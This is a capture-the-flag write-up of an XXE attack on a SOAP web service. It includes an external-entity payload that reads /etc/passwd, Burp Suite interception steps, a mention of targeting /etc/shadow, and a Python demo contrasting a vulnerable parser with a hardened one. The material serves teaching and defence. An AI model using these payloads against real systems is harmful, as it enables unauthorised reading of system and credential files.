SOAP

Figure 1: The challenge description and hints.

XXE attack research

A hint suggests that the /etc/passwd file of the insecure website's back-end can be read through an XML external entity injection, or XXE attack. (Figure 1)

As of 2021, XXE remains in the OWASP Top 10 list of critical web application risks: it had its own category, A4:2017-XML External Entities (XXE), in the 2017 edition and was folded into A05:2021-Security Misconfiguration in the 2021 edition. [1]

As w3schools explains, the eXtensible Markup Language (XML) is a markup language that looks much like HTML, but its purpose is to store and transport data (for example from a client to a server) rather than to display it. In XML a named unit of storage is called an entity; much like a variable in a programming language, it is declared once and can then be referenced by name elsewhere in the document. [2]

According to OWASP, the XXE attack vector is a malicious XML document that the attacker sends to the victim web application's server. The document's DTD declares one or more external entities whose URI names the resource to be read, e.g. file:///etc/passwd, or, in the out-of-band variant, a server under the attacker's control. If the application's XML parser is configured to resolve external entities, it fetches the resource and substitutes its content wherever the entity is referenced, so the content ends up in the application's response or is sent to the attacker's server. [3]

Attack surface deduction

Figure 2: The challenge website’s interface.

The challenge's web portal presents no user input options other than a few 'Details' buttons, which when clicked presumably send HTTP POST requests to the server in order to retrieve the 'Special Info::::' messages displayed as responses. (Figure 2)

A relevant tool in this context is Burp Suite, a set of tools developed by PortSwigger for penetration testing of web applications; PortSwigger's Web Security Academy also documents the XXE technique itself. [4]

The approach is to click a 'Details' button, intercept the HTTP POST request with Burp Suite, and check whether any XML is being sent. If the request body is XML, a DTD declaring an external entity can be prepended and the entity referenced in one of the fields before re-sending the POST request. The SOAP protocol in the challenge's name supports this expectation: SOAP messages are themselves XML envelopes, so the client controls a whole XML document. If instead the client could only control a value that the server embeds into its own XML, a DOCTYPE could not be added and an XInclude attack would be the fallback.

Attack procedure

The URL of the website was opened in Burp Suite's built-in Chromium browser, with the 'Intercept' option in the 'Proxy' tab turned on.

Figure 3: Turning on Burp Suite Proxy’s intercept option.

Clicking the 'Details' button on the web portal produces the following HTTP POST request, which was intercepted by Burp Suite.

There is evidently a block of XML in the body of the HTTP POST request, starting at line 13 of the request (Figure 4), so the next step is to inject an external entity whose URI points at /etc/passwd.

Figure 4: Intercepted HTTP POST request with XML field.

To do this, a DOCTYPE line declaring the external entity is added, then the entity is referenced inside the ID element. The entity is given the unique name cleoptrata.

The following line is added below line 13 of the request. (Figure 5)

<!DOCTYPE injection [ <!ENTITY cleoptrata SYSTEM "file:///etc/passwd"> ]>

Here 'injection' is the name given to the root element in the DOCTYPE; a non-validating parser does not check it against the actual root, so it can be anything, e.g. foo or example. The entity's name is cleoptrata, the SYSTEM keyword marks it as an external entity, and the quoted URI that follows is the path to the passwd file.

Note that inside the ID element, cleoptrata is referenced with:

&cleoptrata;

Figure 5: Altered HTTP POST request with the external entity embedded.

To re-send the modified HTTP POST request to the server, use 'Send to Repeater' and then 'Send' in Burp Suite. The server resolved the entity and returned the contents of the passwd file in its response, revealing the flag. (Figure 6)

Figure 6: HTTP response produced after XXE.
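The exchange above, reproduced as an added example that is not part of the original write-up or the challenge's code: the attacker's SOAP envelope carries the same DOCTYPE and &cleoptrata; reference, and the server side is a minimal xml.sax back-end that reads the ID element. The operation and element names (GetDetails, ID) are assumptions, and the target is a constructed stand-in for /etc/passwd written to a temporary file so the script runs offline. The only difference between the vulnerable and the hardened parser is the feature_external_ges flag: with it enabled expat fetches the SYSTEM URI and splices the file into the ID text, which is exactly what the challenge server echoed back.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for /etc/passwd so the demo runs offline; the flag line is invented.
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n"
    "ctf:x:1001:1001:FLAG{constructed-example-flag}:/home/ctf:/bin/sh\n"
)


def build_soap_request(target_path):
    """Build the attacker's SOAP envelope: a DTD declaring an external entity whose
    SYSTEM URI points at the target file, with the entity referenced inside <ID>.
    The operation and element names (GetDetails, ID) are assumptions."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE injection [ <!ENTITY cleoptrata SYSTEM "file://{target_path}"> ]>\n'
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">\n'
        "  <soap:Body>\n"
        "    <GetDetails>\n"
        "      <ID>&cleoptrata;</ID>\n"
        "    </GetDetails>\n"
        "  </soap:Body>\n"
        "</soap:Envelope>\n"
    )


class IdCollector(ContentHandler):
    """Collects the text of the <ID> element, as a back-end would before echoing it."""

    def __init__(self):
        super().__init__()
        self._in_id = False
        self._chunks = []

    def startElement(self, name, attrs):
        if name == "ID":
            self._in_id = True

    def endElement(self, name):
        if name == "ID":
            self._in_id = False

    def characters(self, content):
        # Content spliced in from a resolved external entity arrives here too.
        if self._in_id:
            self._chunks.append(content)

    @property
    def id_text(self):
        return "".join(self._chunks)


def extract_id(xml_text, resolve_external_entities):
    """Parse the request and return the ID field's text.

    resolve_external_entities=True is the misconfiguration that makes XXE work:
    expat fetches the SYSTEM URI and substitutes the file's content for &cleoptrata;.
    False (the default since Python 3.7.1) leaves the entity unexpanded.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = IdCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return handler.id_text


def run_demo():
    """Write the fake passwd file, send the payload to a vulnerable and to a hardened
    parser, and return (leaked_text, safe_text)."""
    with tempfile.NamedTemporaryFile("w", suffix=".passwd", delete=False) as f:
        f.write(FAKE_PASSWD)
        path = f.name
    try:
        request = build_soap_request(path)
        leaked = extract_id(request, resolve_external_entities=True)
        safe = extract_id(request, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = run_demo()
    print("vulnerable parser returned:\n" + leaked)
    print("hardened parser returned: %r" % safe)
```

The hardened branch is simply the parser's default; the lesson for the defender is never to turn external entity resolution back on for client-supplied XML, and to reach for a library such as defusedxml when the code base cannot be audited for every parser configuration.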

Context

In an educational environment such as the Computer Science website here, this attack is damaging: /etc/passwd lists every local account, so an attacker can enumerate usernames. The attacker could then try the same technique against the shadow file to obtain password hashes, although that only works if the parser runs with enough privilege (normally root) to read /etc/shadow.

The result of this challenge also reveals information about the host: the gnats ('Gnats Bug-Reporting System') entry is a default system account on Debian-derived distributions, so its presence fingerprints the server's operating system family even though it does not by itself prove that the GNATS software is deployed. Such details are valuable to an attacker's reconnaissance for subsequent attacks.

References

[1] OWASP, "OWASP Top Ten," owasp.org, 2021. https://owasp.org/www-project-top-ten/

[2] w3schools, "XML Introduction," w3schools.com, 2015. https://www.w3schools.com/xml/xml_whatis.asp

[3] OWASP, "XML External Entity (XXE) Processing," owasp.org. https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

[4] PortSwigger, "What is XXE (XML external entity) injection? Tutorial & Examples," Web Security Academy, portswigger.net. https://portswigger.net/web-security/xxe
